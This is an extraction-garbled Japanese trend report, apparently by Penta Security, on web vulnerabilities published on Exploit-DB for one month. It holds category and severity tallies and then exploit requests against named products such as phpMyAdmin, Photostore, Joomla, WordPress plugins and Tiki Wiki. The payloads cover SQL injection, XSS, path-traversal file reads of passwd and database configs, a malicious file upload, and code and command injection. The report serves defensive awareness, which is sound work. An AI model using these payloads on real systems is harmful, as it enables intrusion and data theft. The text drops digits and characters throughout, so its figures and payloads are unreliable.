サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー

Size: px

Start display at page:

Download "サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー"

あやかしげまつ
7 years ago
Views:

1 06.07

2 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 7 月に公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross Site Scripting) 攻撃に対する脆弱性の報告件数が最も多く攻撃パターンも多様に発見されました該当脆弱性は一般的に発生するクロスサイトスクリプティング (Cross Site Scripting) 脆弱性ではなく特定プログラム上でのみ発生する脆弱性がほとんどでした主なソフトウェア別脆弱性発生の現況を見るとから最も多い脆弱性が発見されました (* で発見された脆弱性は自体の問題ではなく特定 Plug-in を使う際に発生し得る脆弱性がほとんどです ) 該当脆弱性は Parameter の Value に挿入される形式でありまた特定な header を狙う脆弱性でした脆弱性が発見されたプログラムや Plug-in を使用する管理者はアップデート事項の確認及び早急なアップデートが求められます. 脆弱性別件数脆弱性カテゴリコマンドインジェクション (Command Injection) コードインジェクション (Code Injection) ファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) 件数 SQL インジェクション 9 (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : 5 XSS) 合計脆弱性別件数危険度別分類危険度件数割合早急対応要 6.67% 高 % 合計 % 危険度別分類 8 早急対応要高 3. 攻撃実行の難易度別件数難易度件数割合難 6.67% 中 % 易 70.00% 合計 % 攻撃実行の難易度別件数 7 難中易 4. 主なソフトウェア別脆弱性発生件数ソフトウェア名件数 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 合計 30 主なソフトウェア別脆弱性発生件数 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script

3 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 易高 index.php SQL Injection 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_sho w_keyword&what=&row_number=0%0order% 0by%0--&search_year=06&page= SQL Injection 中高 Billing /admin/aomanage.php?search=&cat=status%0u System () NION%0select%0,,3,version%8%9,5,curre aomanage.php SQL Injection 脆 nt_user,7,8,9,0,,,3,4,5,6,7,8,9,0, 弱性 --&list=3&so=status' () SQL Injection 難早急対応要 Photostore /photostore/gallery/objects/4/ page/ SQL Injection 脆弱性 POST / HTTP/. Chrome/ Safari/535.7 postgalleryform=&gallerysortby=media_id&gallery SortType=asc,(SELECT 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND (0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore XSS 易高 index.php XSS 脆弱性 /ecardmaxdemo/admin/index.php?step=admin_me mber_display&search_field=all&keyword=%3cscript %3Ealert()%3C%Fscript%3E&cmd_button=Sear ch+user XSS 易高 Photostore workbox.php XSS 脆弱性 /photostore/workbox.php?mode=addtolightbox& mediaid= ><script>alert(/xss/)</script> Photostore XSS 易高 Photostore mgr.login.php XSS 脆弱性 /photostore/manager/mgr.login.php?username=de mo&password='><script>alert("xss")</script><input type='hidden Photostore SQL Injection 中高 Billing System () hostingarchiveadmin.php SQL Injection 脆弱性 # /admin/hostingarchiveadmin.php?search=&cat=sta tus UNION select --&list=&so=status' ().9.

4 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です File Upload 易高 PaKnPost Pro.4 - select_.cgi File Upload 脆弱性 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f PaKnPost PaKnPost Pro dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream dd009908f XSS 中高 Billing System () cmanage.php XSS 脆弱性 POST /admin/cmanage.php HTTP/. Chrome/ Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9% 3C%Fscript%3E XSS 中高 Billing System () helpdesk.php XSS 脆弱性 POST /admin/helpdesk.php HTTP/. Chrome/ Safari/535.7 ().9. hd_name="><script>alert()</script> XSS 中高 Billing System () omanage.php XSS 脆弱性 /omanage.php?search=%%3e%3cscript%3eal ert%83%9%3c/script%3e&cat=status%%3e %3Cscript%3Ealert%84%9%3C/script%3E&list =4%%3E%3Cscript%3Ealert%8%9%3C/scr ipt%3e&so=status%%3e%3cscript%3ealert% 8%9%3C/script%3E () XSS 易高 serverserver-settings.jsp XSS 脆弱性 POST /serverserver-settings.jsp HTTP/. Chrome/ Safari/ < 4.0. domain=%%f%3e%3cscript%3ealert%8% 7XSS%7%9%3C%Fscript%3E&remotePort=5 69&serverAllowed=Add+Server XSS 易高 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria advance-user-search.jsp XSS 脆 =admin%/%3e%3cscript%3ealert%8%7xss 弱性 %7%9%3C/script%3E&search=Search 3.0. < XSS 易高 POST /muc-service-edit-form.jsp HTTP/. Chrome/ Safari/ mucservice-edit-form.jsp XSS 脆弱性 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f %3E%3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E

5 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です XSS 易高 POST /plugins/search/search-props-edit-form.jsp HTTP/ Chrome/ Safari/535.7 search-props-edit-form.jsp XSS 脆弱性 3.0. < 4.0. searchenabled=true&searchname=%/%3e%3cs cript%3ealert('xss')%3c/script%3e&grouponly=fa lse XSS 易高 /groupsummary.jsp?search=test%+onmouseover%3dal group-summary.jsp XSS 脆弱性 ert%8%7xss%7%9+x%3d% 3.0. < XSS 易高 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Real3D FlipBook Chrome/ Safari/535.7 Plugin - flipbooks.php XSS 脆弱性 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</scr ipt> SQL Injection 難高 /programs.php?id= %7%0union%0all %0select%0concat%80x7e%C0x7%Cunhe Streamo Online Radio And TV x%8hex%8cast%8database%8%9%0as% Streaming CMS - programs.php 0char%9%9%9%C0x7%C0x7e%9%C SQL Injection 脆弱性 0x %0and%0%7x% 7%3D%7x Streamo Streamo Online Radio And TV Streaming CM LFI 易高 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - /admin/ajax_cms/get_template Chrome/ Safari/535.7 _content/ LFI 脆弱性 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/ XSS 易高 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin LFI 易高 Tiki Wiki CMS flv_stream.php LFI 脆弱性 /player/flv/flv_stream.php?file=../../../db/local.php& position=0 Tiki Wiki Tiki Wiki CMS 5.0 /index.php?app=core&module=system&controller= Code Injection 易高 IPS Community Suite incontent&do=find&content_class=cms\fields{}phpi nfo();/* IPS IPS Community Suite Community Suite 4...3

6 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です XSS 易高 POST /wp-login.php HTTP/. Chrome/ Safari/535.7 Activity Log Plugin. X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f %Fwp-admin%F&testcookie= SQL Injection 易高 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 脆弱性 /index.php?option=com_guru&view=gurupcategs&l ayout=view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component SQL Injection 中高 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/ Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_n ot=&asc_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_pl aylist&boxchecked=0&filter_order_playlist=&filter_or der_dir_playlist= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary= dd009908f XSS 易高 dd009908f Content-Disposition: form-data; name="to_field" Django CMS /en/admin/djangocms_snippet/ id snippet// XSS 脆弱性 dd009908f Content-Disposition: form-data; name="name" Django Django CMS test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> dd009908f SQL Injection 中高 CodoForum index.php SQL Injection 脆弱性 /forum/index.php?u=/user/profile/%0and%0( SELECT%0*(IF((SELECT%0*%0FROM%0(SE LECT%0CONCAT((MID((IFNULL(CAST(CURRENT_U SER()%0AS%0CHAR),0x0)),,45))))s),% ,% ))) CodoForum CodoForum LFI 易高 PHP File Vault /htdocs/fileinfo.php LFI 脆弱性 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f..%fetc%fpasswd PHP File Vault PHP File Vault 0.9

7 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 易高 Ultimate Product Catalog (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/ Safari/535.7 Ultimate Product Catalog id=+or+sleep(0) Command Injection 易早急対応要 POST /tbl_find_replace.php HTTP/. Chrome/ Safari/535.7 PhpMyAdmin tbl_find_rep PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです発見された Cross Site

06.08 サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです発見された Cross Site Scripting らの攻撃は単にスクリプトを使用したりイメージタグを使用するなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー